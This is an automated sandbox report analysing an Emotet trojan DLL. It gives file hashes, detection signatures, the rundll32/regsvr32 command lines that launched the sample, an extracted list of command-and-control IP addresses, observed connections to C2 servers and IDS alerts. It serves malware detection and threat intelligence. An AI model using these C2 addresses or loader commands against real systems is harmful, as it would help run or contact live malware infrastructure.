Edit tour

Windows Analysis Report
CUfsVUDkr6

Overview

General Information

Sample Name:	CUfsVUDkr6 (renamed file extension from none to dll)
Analysis ID:	669368
MD5:	543b633663f40468263782155c1e4cdc
SHA1:	0d7e681d49a1ed2a1539845925eac533c1d0dc7c
SHA256:	aa0bfc40ca7a27bbc6491ba35ee5ac38eb5fbdf2a2d8a4ef9332d340c391ca87
Tags:	32dllexetrojan
Infos:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Snort IDS alert for network traffic

Query firmware table information (likely to detect VMs)

Changes security center settings (notifications, updates, antivirus, firewall)

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

AV process strings found (often used to terminate AV products)

PE file contains strange resources

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Registers a DLL

Queries disk information (often used to detect virtual machines)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6380 cmdline: loaddll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6388 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6408 cmdline: rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 6400 cmdline: regsvr32.exe /s C:\Users\user\Desktop\CUfsVUDkr6.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ofpagmb\vfvyklscua.sam" MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 6420 cmdline: rundll32.exe C:\Users\user\Desktop\CUfsVUDkr6.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6588 cmdline: rundll32.exe C:\Users\user\Desktop\CUfsVUDkr6.dll,DllUnregisterServerr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 6936 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6972 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7040 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7068 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7120 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 2492 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 6248 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 5568 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6484 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6388 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4432 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.135.187.2:6", "48.126.193.2:1", "224.130.193.2:1", "128.130.193.2:1", "136.206.195.2:153", "128.154.195.2:130", "176.130.193.2:1", "128.127.193.2:1", "8.109.194.2:2", "120.8.0.0:1", "56.8.0.0:1", "176.7.0.0:1", "172.7.0.0:1", "96.7.0.0:1", "200.7.0.0:1", "156.7.0.0:1", "240.7.0.0:1", "124.7.0.0:1", "140.7.0.0:1", "144.7.0.0:1", "60.7.0.0:1", "128.7.0.0:1", "224.7.0.0:1", "160.7.0.0:1", "228.7.0.0:1", "244.7.0.0:1", "4.8.0.0:1", "8.8.0.0:1", "72.7.0.0:1", "76.7.0.0:1", "44.7.0.0:1"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.774599292.00000000046C1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.774599292.00000000046C1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.261732368.0000000004760000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.261732368.0000000004760000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.258847425.0000000003390000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.258847425.0000000003390000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.259038196.0000000004CE1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.259038196.0000000004CE1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.774512688.0000000004690000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.774512688.0000000004690000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.261764431.0000000004791000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.261764431.0000000004791000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.258613972.0000000000940000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.258613972.0000000000940000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.258886140.00000000043A1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.258886140.00000000043A1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.rundll32.exe.4ce0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4ce0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.4690000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.4690000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.940000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.940000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.3390000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.rundll32.exe.3390000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.4690000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.4690000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4760000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4760000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.43a0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.43a0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.940000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.940000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.3390000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.rundll32.exe.3390000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4790000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4790000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.46c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.46c0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4760000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.4760000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 19 entries

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 3 - Source IP: 192.168.2.3 - Destination IP: 119.193.124.41

Timestamp:	192.168.2.3119.193.124.414976570802404304 07/20/22-01:06:02.271940
SID:	2404304
Source Port:	49765
Destination Port:	7080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 20 - Source IP: 192.168.2.3 - Destination IP: 51.91.76.89

Timestamp:	192.168.2.351.91.76.894976380802404338 07/20/22-01:06:00.016852
SID:	2404338
Source Port:	49763
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: CUfsVUDkr6.dll

Virustotal: Detection: 66%

Perma Link

Antivirus / Scanner detection for submitted sample

Source: CUfsVUDkr6.dll

Avira: detected

Machine Learning detection for sample

Source: CUfsVUDkr6.dll

Joe Sandbox ML: detected

Source: 00000005.00000002.774143656.0000000002C11000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["160.135.187.2:6", "48.126.193.2:1", "224.130.193.2:1", "128.130.193.2:1", "136.206.195.2:153", "128.154.195.2:130", "176.130.193.2:1", "128.127.193.2:1", "8.109.194.2:2", "120.8.0.0:1", "56.8.0.0:1", "176.7.0.0:1", "172.7.0.0:1", "96.7.0.0:1", "200.7.0.0:1", "156.7.0.0:1", "240.7.0.0:1", "124.7.0.0:1", "140.7.0.0:1", "144.7.0.0:1", "60.7.0.0:1", "128.7.0.0:1", "224.7.0.0:1", "160.7.0.0:1", "228.7.0.0:1", "244.7.0.0:1", "4.8.0.0:1", "8.8.0.0:1", "72.7.0.0:1", "76.7.0.0:1", "44.7.0.0:1"]}

Source: CUfsVUDkr6.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,		2_2_1002592C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,		3_2_1002592C

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 217.182.25.250 8080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 70.36.102.35 443	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 51.91.76.89 8080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 119.193.124.41 7080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 92.240.254.110 8080	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.3:49763 -> 51.91.76.89:8080
Source: Traffic	Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.3:49765 -> 119.193.124.41:7080

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 160.135.187.2:6
Source: Malware configuration extractor	IPs: 48.126.193.2:1
Source: Malware configuration extractor	IPs: 224.130.193.2:1
Source: Malware configuration extractor	IPs: 128.130.193.2:1
Source: Malware configuration extractor	IPs: 136.206.195.2:153
Source: Malware configuration extractor	IPs: 128.154.195.2:130
Source: Malware configuration extractor	IPs: 176.130.193.2:1
Source: Malware configuration extractor	IPs: 128.127.193.2:1
Source: Malware configuration extractor	IPs: 8.109.194.2:2
Source: Malware configuration extractor	IPs: 120.8.0.0:1
Source: Malware configuration extractor	IPs: 56.8.0.0:1
Source: Malware configuration extractor	IPs: 176.7.0.0:1
Source: Malware configuration extractor	IPs: 172.7.0.0:1
Source: Malware configuration extractor	IPs: 96.7.0.0:1
Source: Malware configuration extractor	IPs: 200.7.0.0:1
Source: Malware configuration extractor	IPs: 156.7.0.0:1
Source: Malware configuration extractor	IPs: 240.7.0.0:1
Source: Malware configuration extractor	IPs: 124.7.0.0:1
Source: Malware configuration extractor	IPs: 140.7.0.0:1
Source: Malware configuration extractor	IPs: 144.7.0.0:1
Source: Malware configuration extractor	IPs: 60.7.0.0:1
Source: Malware configuration extractor	IPs: 128.7.0.0:1
Source: Malware configuration extractor	IPs: 224.7.0.0:1
Source: Malware configuration extractor	IPs: 160.7.0.0:1
Source: Malware configuration extractor	IPs: 228.7.0.0:1
Source: Malware configuration extractor	IPs: 244.7.0.0:1
Source: Malware configuration extractor	IPs: 4.8.0.0:1
Source: Malware configuration extractor	IPs: 8.8.0.0:1
Source: Malware configuration extractor	IPs: 72.7.0.0:1
Source: Malware configuration extractor	IPs: 76.7.0.0:1
Source: Malware configuration extractor	IPs: 44.7.0.0:1

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: Joe Sandbox View

IP Address: 217.182.25.250 217.182.25.250

Source: global traffic	TCP traffic: 192.168.2.3:49747 -> 92.240.254.110:8080
Source: global traffic	TCP traffic: 192.168.2.3:49763 -> 51.91.76.89:8080
Source: global traffic	TCP traffic: 192.168.2.3:49764 -> 217.182.25.250:8080
Source: global traffic	TCP traffic: 192.168.2.3:49765 -> 119.193.124.41:7080

Source: unknown

Network traffic detected: IP country count 13

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 92.240.254.110
Source: unknown	TCP traffic detected without corresponding DNS query: 92.240.254.110
Source: unknown	TCP traffic detected without corresponding DNS query: 92.240.254.110
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 217.182.25.250
Source: unknown	TCP traffic detected without corresponding DNS query: 217.182.25.250
Source: unknown	TCP traffic detected without corresponding DNS query: 217.182.25.250
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41
Source: unknown	TCP traffic detected without corresponding DNS query: 119.193.124.41

Source: svchost.exe, 00000016.00000003.377403125.0000023CC0370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000016.00000003.377403125.0000023CC0370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000016.00000003.377421703.0000023CC0381000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.377403125.0000023CC0370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z\|\|.\|\|58dfb4d5-be7e-424e-8739-cac99224843f\|\|1152921505695035586\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000016.00000003.377421703.0000023CC0381000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.377403125.0000023CC0370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIden